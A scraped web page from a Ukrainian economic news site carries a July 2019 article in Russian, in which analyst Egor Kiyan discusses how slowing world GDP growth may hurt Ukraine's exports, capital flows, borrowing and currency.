swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%95%D0%B3%D0%BE%D1%80+%D0%9A%D0%B8%D1%8F%D0%BD+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%B7%D0%B0%D0%BC%D0%B5%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%80%D0%BE%D1%81%D1%82%D0%B0+%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE+%D0%92%D0%92%D0%9F+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%95%D0%B3%D0%BE%D1%80+%D0%9A%D0%B8%D1%8F%D0%BD+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%B7%D0%B0%D0%BC%D0%B5%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%80%D0%BE%D1%81%D1%82%D0%B0+%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE+%D0%92%D0%92%D0%9F+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4766836" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Международные аудиторы продолжают ухудшать прогнозы роста мировой экономики. Международный валютный фонд в третий раз за текущий год снизил оценку мирового ВВП. Особенно опасны риски падения ВВП для развивающихся стран, к которым относится Украина. </p></b> <div style="text-align:center;"> <img width="460" height="360" src="https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n-460x360.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n.jpg 460w, https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n-300x235.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /> </div> <p>С вопросом относительно влияния ухудшения состояния мирового ВВП на экономику Украины «Экономические Новости» обратились за эксклюзивным комментарием к известному эксперту, аналитику по экономическим вопросам Международного центра перспективных исследований Егору Кияну, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p><a class="tag" href="https://enovosty.com/tag/egor-kiyan" target="_blank">Егор Киян</a> сообщает, что ухудшение мирового ВВП, конечно, повлияет на экономику Украины </p><p>&#171;Ухудшение ситуации мировой экономики повлияет на развивающиеся страны, в том числе и на Украину. В первую очередь, ухудшение ситуации мировой экономики будет связано с замедлениями темпов экономического роста и, соответственно, замедлением производства, что приведет к большей закрытости рынков и необходимости усиления их защищенности. </p><p>И у Украины могут возникнуть, во-первых, проблемы с торговлей, то есть с экспортом украинской продукции. Сейчас у нас уже замечается это в металлургической отрасли, где некоторые группы товаров становится все сложнее и сложнее реализовывать. </p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news-finance/full/1705-egor-kiyan-investicii-yavlyayutsya-odnim-iz-drajverov-ukrainskoj-ekonomiki" >Егор Киян: Инвестиции являются одним из драйверов украинской экономики</a></p><p>Во-вторых, у Украины могут возникнуть проблемы с оттоком капитала. В основном, это, конечно, касается спекулятивного капитала. Но когда ситуация в странах ухудшается, в первую очередь, в развивающихся странах, то тут происходит отток капитала в более развитые страны. И, конечно, хотя спекулятивный капитал и напрямую не участвует в инвестиционных или производственных проектах, но он все равно немного ухудшает экономическую ситуацию страны. </p><p>В-третьих, внешние займы. Для Украины становится все сложнее привлекать внешние займы. Потому, что страны, в условиях сокращения роста мирового ВВП, более аккуратно и более бережно относятся к своим деньгам и ресурсам. И, например, облигации, которые мы выпускаем, размещаются под более высокие проценты. Те кредиты, которые мы можем привлечь, нам тоже становится сложнее привлекать. Соответственно, это немного может ударить и по инвестиционной привлекательности страны, что также приведет к сложности займов. А сложности займов для страны ухудшат частично и стабильность национальной валюты. Она может немного просесть. </p><p>Тем не менее, пока все мировые организации говорят про замедление темпов роста экономики, но не про падение темпов экономики. Соответственно, пока на данном этапе паниковать рано, но подготавливаться к самому худшему, как говорится, необходимо. Необходимо налаживать более крепкие связи с иностранными партнерами, чтобы в случае ухудшения мировой коньюнктуры все равно был процесс торговли между странами. Во-вторых, необходимо договариваться и с другими странами по поводу финансовой взаимопомощи и финансовых договоренностей. И в-третьих, необходимо имплементировать необходимые реформы, которые, во-первых, могут обеспечить инвестиционную привлекательность страны и, во-вторых, обеспечить стабильность гривны с запасом для того, чтобы если бы происходили какие-то внешние шоки, чтобы их можно было легко стабилизировать&#187;, &#8212; сообщает эксперт </p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news-finance/full/306-ukraina-dolzhna-nauchitsya-samostoyatelno-razvivatsya-bez-vneshnego-donorstva-egor-kiyan" >Егор Киян рассказал о возможных последствиях объявления Украиной дефолта</a></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4766836"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4766836&amp;_wpnonce=cd8bd17915"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2019-07-29T16:12:14+03:00"/><meta itemprop="dateModified" content="2019-07-29T16:26:02+03:00"/><meta itemprop="genre" content="Новости экономики"/><meta itemprop="description" content="Международные аудиторы продолжают ухудшать прогнозы роста мировой экономики. Международный валютный фонд в третий раз за текущий год снизил оценку мирового ВВП. Особенно опасны риски падения ВВП для развивающихся стран, к которым относится Украина. "/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n-460x360.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n-460x360.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="360"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/egor-kiyan" rel="tag">Егор Киян</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 123</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%95%D0%B3%D0%BE%D1%80+%D0%9A%D0%B8%D1%8F%D0%BD+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%B7%D0%B0%D0%BC%D0%B5%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%80%D0%BE%D1%81%D1%82%D0%B0+%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE+%D0%92%D0%92%D0%9F+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%95%D0%B3%D0%BE%D1%80+%D0%9A%D0%B8%D1%8F%D0%BD+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%B7%D0%B0%D0%BC%D0%B5%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%80%D0%BE%D1%81%D1%82%D0%B0+%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE+%D0%92%D0%92%D0%9F+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4766836" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"><style type="text/css">#wp-social-login-connect-with{clear:both;display:block;font-size:13px;font-weight:normal;padding-top:6px}#wp-social-login-connect-options{padding:4px 0}#wp-social-login-connect-options a{text-decoration:none;margin-right:5px}#wp-social-login-connect-options img{border:0 none;width:22px}.wsl_connect_with_provider{}</style><div class="wp-social-login-widget"><div class="wp-social-login-connect-with">Войти с помощью:</div><div class="wp-social-login-provider-list"><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Facebook&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" title="Connect with Facebook" class="wp-social-login-provider wp-social-login-provider-facebook" data-provider="Facebook"><img alt="Facebook" title="Connect with Facebook" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/facebook.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Google&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" title="Connect with Google" class="wp-social-login-provider wp-social-login-provider-google" data-provider="Google"><img alt="Google" title="Connect with Google" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/google.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Twitter&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" title="Connect with Twitter" class="wp-social-login-provider wp-social-login-provider-twitter" data-provider="Twitter"><img alt="Twitter" title="Connect with Twitter" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/twitter.png" /></a></div><div class="wp-social-login-widget-clearing"></div></div> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="a4fced4c5d" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><div style="height: 10px; background-color: #fff;"></div><div class="mainPageWiget blogmain" style="border: 1px solid #dee7ee; padding: 0; margin: 0;"><div><a href="/vybory-2019"><img src="/wp-content/themes/eizvestia/img/vibory_2019.png" alt="Выборы 2019" /></a></div><table style="width:100%; margin-top: 5px;"><tr><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/2507-rada-intrig-i-syurprizov-kak-vyglyadit-portret-vru-ix-sozyva" title="Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва"><img style="width: 145px; height:94px" alt="Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва" src="/wp-content/uploads/2019/07/24412625-300x201.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/2407-medvedchuk-v-novoj-rade-budet-v-oppozicionnom-getto-politolog" title="Медведчук в новой Раде будет в «оппозиционном гетто» - политолог"><img style="width: 145px; height:94px" alt="Медведчук в новой Раде будет в «оппозиционном гетто» - политолог" src="/wp-content/uploads/2019/07/fesenko-300x185.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_society/full/2407-vozrast-novyx-deputatov-rada-pomolodela-na-sem-s-polovinoj-let" title="Возраст новых депутатов: Рада помолодела на семь с половиной лет"><img style="width: 145px; height:94px" alt="Возраст новых депутатов: Рада помолодела на семь с половиной лет" src="/wp-content/uploads/2019/07/rada-300x200.jpeg"></a></div></td></tr><tr><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/2507-rada-intrig-i-syurprizov-kak-vyglyadit-portret-vru-ix-sozyva" style="color: #000000; font-size: 12px; line-height: 13px;">Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/2407-medvedchuk-v-novoj-rade-budet-v-oppozicionnom-getto-politolog" style="color: #000000; font-size: 12px; line-height: 13px;">Медведчук в новой Раде будет в «оппозиционном гетто» - политолог</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_society/full/2407-vozrast-novyx-deputatov-rada-pomolodela-na-sem-s-polovinoj-let" style="color: #000000; font-size: 12px; line-height: 13px;">Возраст новых депутатов: Рада помолодела на семь с половиной лет</a></td></tr></table><div class="more"><a href="/vybory-2019">Все Выборы</a></div></div><div style="height: 10px; background-color: #fff;"></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766572"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/markets/full/2707-osobennosti-priobreteniya-nedvizhimosti-v-kottedzhnyx-gorodkax">Особенности приобретения недвижимости в коттеджных городках</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766537"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2607-itogi-dnya-novye-provokacii-fsb-ustupki-gazproma-i-strasti-vokrug-okruzhnogo-suda">Итоги дня: Новые провокации ФСБ, уступки "Газпрома" и страсти вокруг Окружного суда</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766345"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2607-itogi-dnya-portret-novoj-rady-zaderzhannyj-tanker-rf-i-podgotovka-k-neprostoj-zime">Итоги дня: Портрет новой Рады, задержанный танкер РФ и подготовка к непростой зиме</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766401"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2507-ty-skazhi-mne-chyo-ty-xosh-moskva-uporno-xochet-razvalit-ukrainu-donbassom">«Ты скажи мне, чё ты хошь!» Москва упорно хочет развалить Украину Донбассом</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766203"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2407-itogi-dnya-poziciya-zelenskogo-po-krymu-i-donbassu-i-vozvrashhenie-ukrainskix-moryakov">Итоги дня: Позиция Зеленского по Крыму и Донбассу и возвращение украинских моряков</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766053"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2307-itogi-dnya-vozdushnye-provokacii-osvobozhdenie-poslednego-regionala-i-padenie-ceny-na-gaz">Итоги дня: Воздушные провокации, освобождение последнего регионала и падение цены на газ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4765902"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2307-vybory-v-radu-2019-prognozy-i-ocenki-ekspertov">Выборы в Раду 2019: прогнозы и оценки экспертов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4765855"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2207-itogi-dnya-mnobolshinstvo-sluga-naroda-xishhenie-v-oboronke-i-zagadka-budushhej-koalicii">Итоги дня: Монобольшинство Слуги народа, яркие "пролеты" скандальных политиков и загадка будущей коалиции</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4765470"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1907-itogi-dnya-pobeda-naftogaza-mobilnye-xizhiny-dlya-voennyx-i-gromkoe-delo-sbu">Итоги дня: Победа "Нафтогаза", "мобильные хижины" для военных и раскрытие громкой схемы</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4765541"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1907-ze-komanda-ubiraet-poroshenkovskogo-posla-v-amerike-chalogo-prostyat-li-u-trampa-ukrainagejt-i-kolomojskogo">Зе-команда убирает порошенковского посла в Америке Чалого. Простят ли у Трампа «Украинагейт» и Коломойского?</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/2607-v-kremle-s-putinym-proizoshel-konfuz-video"><img width="142" height="88" alt="В Кремле с Путиным произошел конфуз" src="https://enovosty.com/wp-content/uploads/2019/07/kon.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/2607-v-kremle-s-putinym-proizoshel-konfuz-video">В Кремле с Путиным произошел конфуз</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/proishestviya-video/full/2507-v-ssha-mertvaya-kurica-vnezapno-ozhila-i-sbezhala-s-tarelki-video"><img width="142" height="88" alt="В США мертвая курица-зомби внезапно ожила и сбежала с тарелки" src="https://enovosty.com/wp-content/uploads/2019/07/kuritsa.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/proishestviya-video/full/2507-v-ssha-mertvaya-kurica-vnezapno-ozhila-i-sbezhala-s-tarelki-video">В США мертвая курица-зомби внезапно ожила и сбежала с тарелки</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/politika-video/full/2507-vsu-nanesli-sokrushitelnyj-udar-po-terroristam-na-donbasse-video"><img width="142" height="88" alt="ВСУ нанесли сокрушительный удар по террористам на Донбассе" src="https://enovosty.com/wp-content/uploads/2019/07/2209986-1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/politika-video/full/2507-vsu-nanesli-sokrushitelnyj-udar-po-terroristam-na-donbasse-video">ВСУ нанесли сокрушительный удар по террористам на Донбассе</a></div></td></tr><tr><td class="view"><span><i></i>8050</span></td><td class="view"><span><i></i>6807</span></td><td class="view last"><span><i></i>5656</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/2507-moshhnyj-progress-v-ukraine-ispytali-novejshee-raketnoe-oruzhie-video"><img width="142" height="88" alt="Мощный прогресс: В Украине испытали новейшее ракетное оружие" src="https://enovosty.com/wp-content/uploads/2019/07/olha.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/2507-moshhnyj-progress-v-ukraine-ispytali-novejshee-raketnoe-oruzhie-video">Мощный прогресс: В Украине испытали новейшее ракетное оружие</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/politika-video/full/2407-v-seti-pokazali-kadry-sorevnovanij-ukrainskix-tankistov-v-zone-oos-video"><img width="142" height="88" alt="В Сети показали кадры соревнований украинских танкистов в зоне ООС" src="https://enovosty.com/wp-content/uploads/2019/07/1715b9435f91f561-e1563964901770.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/politika-video/full/2407-v-seti-pokazali-kadry-sorevnovanij-ukrainskix-tankistov-v-zone-oos-video">В Сети показали кадры соревнований украинских танкистов в зоне ООС</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2407-v-rf-ustanovili-bombu-na-puti-kortezha-putina-video"><img width="142" height="88" alt="В РФ установили «бомбу» на пути кортежа Путина" src="https://enovosty.com/wp-content/uploads/2019/07/ishchi.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2407-v-rf-ustanovili-bombu-na-puti-kortezha-putina-video">В РФ установили «бомбу» на пути кортежа Путина</a></div></td></tr><tr><td class="view"><span><i></i>5303</span></td><td class="view"><span><i></i>4215</span></td><td 